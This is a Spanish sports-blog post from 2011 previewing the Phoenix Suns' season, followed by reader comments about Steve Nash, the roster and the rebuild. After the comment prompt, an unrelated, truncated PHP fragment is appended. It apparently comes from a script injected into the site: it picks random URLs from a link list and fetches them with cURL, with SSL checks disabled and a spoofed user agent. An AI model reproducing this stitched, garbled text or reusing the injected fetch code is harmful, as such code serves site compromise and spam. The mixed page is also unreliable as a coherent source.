Phoenix Suns: Soles apagados

29 de December de 2011 por Love Denise

Pocas o ninguna reminiscencia queda ya de aquellos Suns de D’Antoni comandados por el trío Nash-Marion-Amare que nos hacía vibrar cada noche con su run and gun y su juego alocado. Los actuales Suns, bajo el mando de Alvin Gentry, están condenados a reconstruir el equipo y a poner el punto de mira en el Draft de 2012 y en los suculentos agentes libres del próximo verano. Margen salarial tendrán de sobra aunque se antoja complicado que algunos de los peces gordos se desplace hasta Arizona a corto plazo.

Mientras el verano de 2012 llega, los Suns afrontarán una temporada de transición, probablemente con muchas derrotas y con muchos partidos intranscendentes para ellos.

Durante la mini-pretemporada, los Suns amnistiaron a Vince Carter, que puso rumbo a Dallas, y se deshicieron de Zabian Dowdell. Sus huecos fueron reemplazados por Shannon Brown, Sebastian Telfair y Ronnie Price.

El alma del equipo volverá a ser Steve Nash. A sus 37 años, el base canadiense afrontará probablemente su última temporada en Phoenix. El año que viene será agente libre, y a buen seguro, querrá fichar por un equipo ganador antes de colgar las botas. Sus minutos de descanso intentarán ser aprovechados por dos bases recién llegados del mercado de agentes libres, Sebastian Telfair, base contrastado pero rebotado de los múltiples equipos por los que ha pasado, y Ronnie Price, un jugador de los que completan el roster.

En el perímetro, como titulares continuarán el veterano Grant Hill, ya en su decimosexta temporada como profesional, al cual renovaron por una temporada y la nada despreciable ficha de 6’5 millones de dólares , y Jared Dudley, un jugador con muy buen tiro dese la media y larga distancia, pero lejos de ser un jugador al que se le pueda ordenar la mision de tirar ofensivamente del equipo. Desde el banco, el recién llegado Shannon Brown se postula como sexto hombre del equipo. El ex-laker fue contratado en el mercado de agentes libres por una temporada a razón de 3’5 millones. La otrora estrella de la Euroliga, Josh Childress, completará el perimetro. La salida a última hora de Mickael Pietrus hacia Boston merma aún más la calidad del equipo y hace más notorio la falta de calidad en el perímetro. Uno de los más flojos de la competición.

En la pintura, encontramos la mayor competitividad del equipo. Para el puesto de “4”, dos buenos jugadores ofensivos pero con mucha capacidad para desconcentrarse y salirse de los partidos. Hablamos de Hakim Warrick y de Channing Frye, que pelearán con la única noticia positiva de la pobre pretemporada de los Suns, el rookie Markieff Morries, que ha promediado 11 puntos y más de 7 rebotes en los dos partidos de pretemporada disputados por los Suns, ambos ante Nuggets y en ambos cayendo derrotados de forma escandalosa.

En el puesto de center, el polaco Marcin Gortat está llamado a ser uno de los pilares donde se cimente la reconstrucción del equipo en los próximos años. Si todo va en su curso, debería moverse en cifras superiores al doble-doble de media. Como suplente tendrá a Robin López, cuyo rendimiento no ha sido el esperado en las tres temporadas que lleva en las filas de los de Arizona. El sophomore Garret Siler completará el roster pero su presencia en pista se antoja a priori como testimonial.

Quinteto: Steve Nash, Jared Dudley, Grant Hill, Channing Frye, Marcin Gortat
Sexto hombre: Shannon Brown / Hakim Warrick

Pronóstico: Fuera de Playoffs

Comenta

14 comentarios a esta entrada

  1. Ru dice:
    #1

    Panorama bastante triste para una franquicia que quién más quién menos le tiene algo de simpatía,ya sea por el run and gun,ya sea por el gordo Barkley.Reconstrucción a largo plazo.

      Citar

  2. TheDeerHunter dice:
    #2

    Yo más que fuera de playoffs tal y como está pintando la cosa en el oeste van a tener que pelear para evitar últimas plazas. Igual hay sorpresas antes del trade deadline.

      Citar

  3. nach dice:
    #3

    Esperemos a ver si Nash el año que viene puede tener el anillo que se merece. En los Heat sería algo descomunal lanzando a Wade y LeBron…

      Citar

  4. GreenPride dice:
    #4

    Claramente temporada de transición en la despedida del gran Steve Nash.Tienen un equipo para estar muy abajo en el Oeste y no queda nada de aquella forma rápida y vistosa de jugar excepto el propio Steve. Ahora lo mejor para ellos es empezar a reconstruir buscando alguna estrella en el draft y dar una salida por todo lo alto a Nash. Éste seguro que irá a algún equipo con aspiraciones el año que viene. Los Lakers necesitan un base desesperadamente y quizás sería un buen sitio para aspirar al título en sus últimos años. A los Heat también les vendría de perlas pero ya sería demasiado, además no le veo con LeBron y Wade. Ahora hay muchos bases-estrella así que veremos donde acaba encajando…

      Citar

  5. nach dice:
    #5

    Pues yo en Miami lo veo perfectamente, es más, el equipo me parece tremendo para jugar run&gun, con Wade, Bosh y LeBron, 3 jugadores rapidísimos para sus posiciones…

    Otra cosa es que Wade y LeBron se adaptaran a no sobar el balón y ser prácticamente meros ejecutores de las genialidades de Nash, ese tema es muy distinto. Otro bueno destino podrían ser los Knicks, que están necesitados de un director, o incluso Dallas, toda vez que Kidd queda liberado la temporada que viene, pero para mí su destino es Miami.

      Citar

  6. nach dice:
    #6

    Eso por no decir que en Miami garantirizaría ser otra alternativa a la anotación en caso de que Wade o LeBron tuvieran un mal partido (como Wade ayer), porque este señor se va por encima de los 20 puntos si quiere.

      Citar

  7. The wolf dice:
    #7

    Nada…a los seguidores de los Suns lo unico que nos queda es tener algun que otro equipo “simpatico” al cual apoyar estos años porque el nuestro no nos va a dar mas que disgustos…lo unico que me preocupa ahora es el draft de 2012 y algun que otro milagro que pueda ocurrir…quien sabe….pero de momento desierto…solo desierto

      Citar

  8. ralage dice:
    #8

    Tiempo van a tardar estos Suns en volver a playoffs, y es que ahora mismo tienen uno de los roster mas pobres de la nba, un propietario “tacaño” y un mercado como mucho mediano.
    Vamos, que no me extrañaría que fuesen los próximos Minnesota

    Pd: Carter no fue amnistiado (eso se lo deberían aplicar a Childress) sino cortado pagándole 4 M que tenía garantizados

      Citar

  9. @pedrolongas dice:
    #9

    childress tiene un juego lamentable……… no hablo de estadística si no de juego…. es malo, no sabe hacer un bloqueo, solo es capaz de hacer bandejas tras bloqueos, mala visión de juego…… no se como tiene ese contrato, creo que lo mejor que puede hacer es no tocar el balón mientras está en el campo. Por no hablar de la mecánica de tiro, que es una mofa para la nba.

      Citar

  10. RSB dice:
    #10

    Yo creo que los Suns le caen bien a todo el mundo (o casi). Lástima que no pudieran usar dos amnistías, porque lo de Childress clama al cielo. Y por mucha ley que le tengo a Nash, mucho me temo que serán los últimos en el salvaje oeste, donde no hay ningún equipo realmente débil, débil. A los que podrían pillar en ratio de victorias son quizás a Minnesota (y si apuro mucho Utah o Kings), y en ambos equipos hay más juventud, margen de progresión y mejor panorama para una reconstrucción, así que lo veo negro, negro.

      Citar

  11. Sancho88 dice:
    #11

    Bueno, Childress no fue estrella en europa ni na, solo les timó 5 kilos por temporada a los Aggelopoulos, nada más. Mediocridad los Suns no, lo siguiente. Ayer Philly les ganó en plan tranquilete, sin forzar. Podían haberles metido de 30 o 40, pero al final se relajaron. Casi me parece bueno Robin López entre el resto… en fin, lamentable. Y lo de Carter es lo que dice ralage, un contrato de 18 kilos que fue ‘cortado’ por el mínimo garantizado, es decir, 4 kilos en su caso. Firmó por 3 millones con Dallas.

      Citar

  12. The wolf dice:
    #12

    Michael Redd a los Suns……32 añitos…aumentamos el asilo?

      Citar

  13. Denise dice:
    #13

    Con Redd o sin Redd los Suns no se van a comer un colin. Es mas un fichaje para intentar entusiasmar al publico, un reclamo.No sé por cuanto y por qué cantidad habra fichado pero tampoco creo que se vaya a llevar un pastizal.

      Citar

  14. r_miller dice:
    #14

    la realidad para phoneix es qe nash se va a ir, io intentaria sacar algo por el, ia no es lo qe era, tiene 37 años, pero nose cambiarlo por algun joven con progression de algun equipo con aspiraciones para el anillo. Su unica esperanza es qe tengan una buena ronda del draft i qe el qe venga sea un mega crack de la talla de lebron. Si no la temporada qe viene sera penosa i no ira ni el entrenador a verlos jugar.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>